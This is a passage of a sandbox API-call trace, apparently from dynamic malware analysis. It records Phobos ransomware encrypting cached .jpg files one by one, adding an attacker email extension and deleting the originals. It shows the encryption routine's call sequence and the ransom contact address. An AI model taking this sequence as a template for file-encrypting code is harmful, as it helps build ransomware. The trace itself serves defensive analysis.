lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.178] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2408) returned 1 [0175.178] CloseHandle (hObject=0x148) returned 1 [0175.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg")) returned 0x2020 [0175.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.178] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.178] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.179] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.179] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.179] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x968, lpOverlapped=0x0) returned 1 [0175.209] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x970, dwBufLen=0x970 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x970) returned 1 [0175.209] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x970, lpOverlapped=0x0) returned 1 [0175.741] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0175.741] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.741] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.741] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.741] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.741] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.741] CloseHandle (hObject=0x148) returned 1 [0175.741] CloseHandle (hObject=0x178) returned 1 [0175.741] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBDZoZR[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbdzozr[1].jpg")) returned 1 [0175.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.756] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8326) returned 1 [0175.756] CloseHandle (hObject=0x178) returned 1 [0175.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg")) returned 0x2020 [0175.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.757] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.757] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.757] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.757] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2086, lpOverlapped=0x0) returned 1 [0175.834] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2090, dwBufLen=0x2090 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2090) returned 1 [0175.834] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2090, lpOverlapped=0x0) returned 1 [0175.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0175.835] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.835] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0175.835] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.835] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0175.836] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0175.836] CloseHandle (hObject=0x178) returned 1 [0175.836] CloseHandle (hObject=0x148) returned 1 [0175.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdE0f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbede0f[1].jpg")) returned 1 [0175.837] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0175.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.846] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1690) returned 1 [0175.846] CloseHandle (hObject=0x148) returned 1 [0175.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg")) returned 0x2020 [0175.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0175.846] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.846] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0175.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0175.846] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0175.846] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0175.846] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x69a, lpOverlapped=0x0) returned 1 [0176.007] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6a0, dwBufLen=0x6a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6a0) returned 1 [0176.007] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6a0, lpOverlapped=0x0) returned 1 [0176.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.008] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.008] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.008] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.008] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.008] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.008] CloseHandle (hObject=0x148) returned 1 [0176.008] CloseHandle (hObject=0x178) returned 1 [0176.009] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEdqEy[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbedqey[1].jpg")) returned 1 [0176.016] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.027] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=13335) returned 1 [0176.027] CloseHandle (hObject=0x178) returned 1 [0176.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg")) returned 0x2020 [0176.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.028] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.028] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3417, lpOverlapped=0x0) returned 1 [0176.176] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3420, dwBufLen=0x3420 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3420) returned 1 [0176.176] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3420, lpOverlapped=0x0) returned 1 [0176.177] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0176.177] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.177] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0176.177] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.177] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0176.177] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.177] CloseHandle (hObject=0x178) returned 1 [0176.177] CloseHandle (hObject=0x148) returned 1 [0176.178] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEeTuf[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbeetuf[1].jpg")) returned 1 [0176.179] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0176.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.207] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=15436) returned 1 [0176.207] CloseHandle (hObject=0x148) returned 1 [0176.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg")) returned 0x2020 [0176.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0176.208] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.208] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0176.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEfjuT[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbefjut[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0176.208] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0176.208] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3c4c, lpOverlapped=0x0) returned 1 [0176.256] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, 